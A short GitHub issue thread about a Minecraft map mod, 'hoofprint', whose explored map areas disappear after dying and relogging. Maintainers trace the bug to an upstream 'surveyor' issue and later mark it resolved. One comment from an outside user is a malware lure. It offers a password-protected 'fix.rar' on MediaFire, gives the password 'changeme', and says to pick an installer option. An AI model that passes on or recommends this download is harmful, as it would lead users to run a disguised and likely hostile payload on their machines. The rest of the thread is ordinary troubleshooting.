### ISSUE TITLE
map isn't staying explored properly

### ISSUE THREAD

**Issue by 800020h** [HestiMae/hoofprint#5]
hoofprint 0.5.5+1.21

sometimes I open my map and most of it is gone
but the markers are still there

attempts to reproduce intentionally have so far been unsuccessful
I tried various things with relogging, relaunching, going in a different world, and exploring lots of map

maybe it's related to the fix of https://github.com/HestiMae/hoofprint/issues/4

**Comment by akshsekhr2702** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by 800020h** [comment]
I just tried dying then relogging and that seemed to trigger it

**Comment by 800020h** [comment]
there is enough in `<save_name>/data/surveyor` that I think the data still exists just the map isn't drawn

**Comment by sleepingdragoninn** [comment]
this is an underlying surveyor issue also trackered here: https://github.com/sisby-folk/antique-atlas/issues/170

Feel free to add context with your logs, whether you were playing singleplayer or multiplayer, and whether you were using "open to lan"

**Comment by sleepingdragoninn** [comment]
resolved in surveyor latest
